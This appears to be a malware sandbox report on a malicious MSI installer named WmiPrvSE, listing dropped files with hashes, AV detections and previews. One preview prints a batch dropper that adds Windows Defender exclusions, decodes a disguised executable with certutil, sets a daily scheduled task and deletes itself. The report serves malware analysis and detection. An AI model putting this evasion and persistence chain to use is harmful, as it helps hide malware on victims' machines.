                                        Preview:-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAAAAAAAAAAAA..AAAAAPAALwILAgIiACIAAAAABQAACgAAwBQAAAAQAAAAAEAAAAAAAAAQAAAAAgAA..BAAAAAAAAAAFAAIAAAAAAABwBQAABAAABwYFAAIAAAAAACAAAAAAAAAQAAAAAAAA..AAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAQAUA2AgAAAAAAAAAAAAA..ABAFALgCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..YAAFACgAAAAAAAAAAAAAAAAAAAAAAAAAJEIFAOgBAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAudGV4dAAAAKggAAAAEAAAACIAAAAEAAAAAAAAAAAAAAAAAABgAFBg..LmRhdGEAAADwvAQAAEAAAAC+BAAAJgAAAAAAAAAAAAAAAAAAQABgwC5yZGF0YQAA..EAkAAAAABQAACgAAAOQEAAAAAAAAAAAAAAAAAEAAYEAucGRhdGEAALgCAAAAEAUA..AAQAAADuBAAAAAAAAAAAAAAAAABAADBALnhkYXRhAAA4AgAAACAFAAAEAAAA8gQA..AAAAAAAAAAAAAAAAQAAwQC5ic3MAAAAA0AkAAAAwBQAAAAAAAAAAAAAAAAAAAAAA..AAAAAIAAYMAuaWRhdGEAANgIAAAAQAUAAAoAAAD2BAAAAAAAAAAAAAAAAABAADDA..LkNSVAAAAABoAAAAAFAFAAACAAAAAAUAAAAAAAAAAAAAAAA
                                        Process:C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):396
                                        Entropy (8bit):5.1449661450238695
                                        Encrypted:false
                                        SSDEEP:6:s8GAeGgdEY1AuaHJO98GAeGgdEWRyYAuaHsNkjxIaH3ncENaHsIb5ksycMaHsEKs:s8OuVI98OuVl74be6Kdh4
                                        MD5:F1944530E0E4C27AC00560AF1F92249B
                                        SHA1:C24F124EC1F696A7D41492C9C471DA95E7BF9D74
                                        SHA-256:361DB3755D1CE2DB5FF0C28CEC3C5481CBE2ECAC0A45CC6617721DC375A4C7C7
                                        SHA-512:07B7F9AEB8D9E6C6419CD1C4F501B8E1B91AE1D2895003042F2ED48FBB47CFDE2BE84FB1DEC1573621EDD433904327F5CAD9021581FF79680A6D487A2714053D
                                        Malicious:true
                                        Preview:powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"..powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"..certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe..SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f..start C:\Users\Public\WmiPrvSE.exe..del C:\Users\Public\WmiPrvSE.bat
                                        Process:C:\Windows\System32\certutil.exe
                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):328704
                                        Entropy (8bit):7.320317256363974
                                        Encrypted:false
                                        SSDEEP:6144:gbDlaRBELE5d3qnyoXPzceVMhtO6sveBnG+2pB0Qh9:gbD8BFgymPLMhU6s7p
                                        MD5:29FA5E4FD104FD12A870D2DD90E42B31
                                        SHA1:C027A673909EB95A74B7AE364FC52797C683EE3C
                                        SHA-256:298EADA4723177FAC953AFC963A4BFFA56D7DBBA3D1BEA340E53953E736BCA80
                                        SHA-512:5D956128F2CEE43EFF2ADB85E08F288721C3A244A7DEF649C05171E9A54D656880A55FDB4B8336DF08BBD007246C4BA3DAEDF309159093C16E486C6F490DA880
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Joe Sandbox View:
                                        • Filename: wj7vzBqUl9.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p................ ..............................................@..............................................................`...(...................$B...............................text.... ......."..................`.P`.data.......@.......&..............@.`..rdata..............................@.`@.pdata..............................@.0@.xdata..8.... ......................@.0@.bss.........0........................`..idata.......@......................@.0..CRT....h....P......................@.@..tls.........`......................@.@.........................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1336
                                        Entropy (8bit):5.440603014622264
                                        Encrypted:false
                                        SSDEEP:24:3iT0cYRSKco4KmZjKbmOIKod6emN1s4RPQoU99tJBJt/NK3R8IHia/U:y4xRSU4xympjms4RIoU99tJBLNWR8IHy
                                        MD5:282631418ED954F70A649FC883F6F8D5
                                        SHA1:0608B7EA269CCC8CEBBDDB4FDC3E168C5F343333
                                        SHA-256:8C6D7C4C8CD0B67B6079A0FB1032055275119FBE7839E49E0275E0B06F702F2B
                                        SHA-512:B7D4D3C7B91EC2DFFBCFFB625AC2B8901853B1742F24F809E81ED9FF0BF060ECAC6076FD4FB999031DA38A0FE3FDA81B067C4ED8792482B1CFEACD6C3AB2C287
                                        Malicious:false
                                        Preview:@...e.................................R..............@..........L...............h..t...D.d.u.........!.Microsoft.PowerShell.ScheduledJob...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Command
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):684087
                                        Entropy (8bit):7.2201422315209856
                                        Encrypted:false
                                        SSDEEP:12288:xyveQB/fTHIGaPkKEYzURNAwbAgB2X+t4/EIHK6qVQid0f2aT344Ws/5g:xuDXTIGaPhEYzUzA0/0/c6hVfWsK
                                        MD5:D2733BF9C81DDF4F730C65FCE8E02629
                                        SHA1:139E56192C8AEE644355B21CFFC126C21DF9A9EB
                                        SHA-256:26B74954ED3E0E81B4F9304E3BAA149866320A10F5F6468883C9FA6358A75A6C
                                        SHA-512:D999961137DF462BB78B8BA0BE815B9BBCEE44836BA7C565533CA03893B652D2A58307AB9A357DC1CC2EE6D58B98D0F4FAE2F5078312603570ED56A7DE763707
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 47%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...8.................@..........................................`.............................................4......P.......`.......l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...`...........................@..@.reloc..p...........................@..B........................................................................................................................................
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):894464
                                        Entropy (8bit):6.408586469367967
                                        Encrypted:false
                                        SSDEEP:12288:DY6lpaZuacp2VCRcpL+W7AeUWKi6jHXG7709QvTQIWKAoS5WePD3yB:3L6sRcpF7Ui6jH277zvERH5BzyB
                                        MD5:10F3B7105634BEF29E229ECDA63E08C1
                                        SHA1:5DEEE5CDBBE1B390C26DA2C7322D0164A712612B
                                        SHA-256:745C182EE546D40E060348E3BE4719B1C2B2156E0B30A2CAB1CC035F5F33A132
                                        SHA-512:4FC7AED04A92463A00B99D6ABBEEC66B81CCDC43E2ED973426EB38F3DDADEE77AB5F6102B29B0FAB6A36B1C6C7CDD55717D969675606FEFCA2086EC34A33E2FA
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i.......i......mi..s....i..s....i.......i..s...i.......i.......i...i...h......Ei.......i...il..i.......i..Rich.i..........PE..L....=.d.........."....$............'.............@..........................@............@.................................`I.......................................!..p....................!......(...@....................C.......................text...&........................... ..`.rdata..............................@..@.data....q...p.......P..............@....rsrc................h..............@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1202
                                        Entropy (8bit):3.5183967914820435
                                        Encrypted:false
                                        SSDEEP:24:Q+xDRqY+8aRqYYYRqYA1RqYSGFcRqYfzv:rx+8xpE
                                        MD5:6EBE10FE76FFAFA3B8223D11286C6423
                                        SHA1:2A10DADF1AAAD62D169DA09C9F655AA0903ECBF2
                                        SHA-256:D22DE7249DEECE972F466305FC4921D77CEE6ADF5F869C98C826EC85C9BCDE73
                                        SHA-512:B5DC86A870688FEC1A0DA9C430CE77F077F03F85EF448C48EACEC8DA86EFFAD6DC703AF150369D8830BB470A27670A232EF09CBF98F7408A053A3EF2786E784A
                                        Malicious:false
                                        Preview:..[.G.e.n.e.r.a.l.O.p.t.i.o.n.s.].....O.p.t.i.o.n.s.=.b.h.....D.o.w.n.l.o.a.d.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....E.x.t.r.a.c.t.i.o.n.F.o.l.d.e.r.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.....[.P.R.E.R.E.Q.U.I.S.I.T.E.S.].....A.p.p.1.=.D.e.s.k.t.o.p.....[.A.p.p.1.].....S.e.t.u.p.F.i.l.e.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.D.e.s.k.t.o.p.\.D.e.s.k.t.o.p...e.x.e.....O.p.t.i.o.n.s.=.i.p.....[.P.R.E.R.E.Q._.C.H.A.I.N.E.R.].....C.l.e.a.n.u.p.F.i.l.e.s.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.m.i.P.r.v.S.E.\.W.m.i.P.r.v.S.E.\.p.r.e.r.e.q.u.i.s.i.t.e.s.\.D.e.s.k.t.o.p.\.D.e.s.k.t.o.p...e.x.e.....C.l.e.a.n.u.p.F.o.l.d.e.r.s.=.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):23157
                                        Entropy (8bit):6.027744169890565
                                        Encrypted:false
                                        SSDEEP:384:gsgQpJjMUUm3Bwr2sGjFsbAeXqom+056H46ft7kpWkXq3OD1uz9pmfBYyEpGnQx1:eQpJjMUU+JsK2XYSF7MQpSBYXAnQx1
                                        MD5:E7E28EB10AA6A99ADF64C4849E33708A
                                        SHA1:01D0CD74385A0CC88AAD9BEC1C16C92FB6D1C605
                                        SHA-256:2A2267D05F9FBC4127DD239772B28FE5B77915564CD38EF040299C6FD8B3C406
                                        SHA-512:FE28356A2DBF7A8836C0148B13F060FD7C1A6A5EDD828483A863AF3AE3FAE1A3970DD02B84E673D7722629F234764418837F0F4FDE363BE2BDDF626052784614
                                        Malicious:false
                                        Preview:param(.. [Parameter(Mandatory = $true)].. [string[]]$paths,.. [int]$retry_count = 0..)....# Delete paths using parallel jobs. ..$jobs = $paths | ForEach-Object {.. Start-Job -ScriptBlock {.. param(.. [string]$path,.. [int]$retry_count = 0.. ).... if (Test-Path -LiteralPath $path) {.. $count = 0.. while ($true) {.. Remove-Item -LiteralPath $path -Force.. if (-not (Test-Path -LiteralPath $path) -or ($count -ge $retry_count)) {.. return;.. }.. $count++.. Start-Sleep -s 5 #sleep 5 seconds.. } .. }.. } -ArgumentList $_, $retry_count ..}....# Wait for the delete jobs to finish..Wait-Job -Job $jobs....# Self delete..Remove-Item -Path $MyInvocation.MyCommand.Source....# SIG # Begin signature block..# MII9SwYJKoZIhvcNAQcCoII9PDCCPTgCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMC
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {9AD54326-34E0-4D44-AFB7-7A7E831CAF55}, Number of Words: 2, Subject: WmiPrvSE, Author: WmiPrvSE, Name of Creating Application: WmiPrvSE (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install WmiPrvSE. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Jul 11 10:40:05 2024, Number of Pages: 200
                                        Category:dropped
                                        Size (bytes):3488768
                                        Entropy (8bit):6.707780137964601
                                        Encrypted:false
                                        SSDEEP:49152:rDjlabwz90h5lmAnAis277zMRH51yB5k+q4E5q8g73SQLWj1s9w4Uf5rXf63h0er:HqwqhLS4776R+XMQyj1s9wP
                                        MD5:616BC662C460329DD73754A96E59277B
                                        SHA1:0131FC44067C83E3EFD8DFE12029E7DF0B44F4A3
                                        SHA-256:29DD2916C20E18B713A8ECB72D3DF632961E818CF35484EC6BAFEDC2FF415680
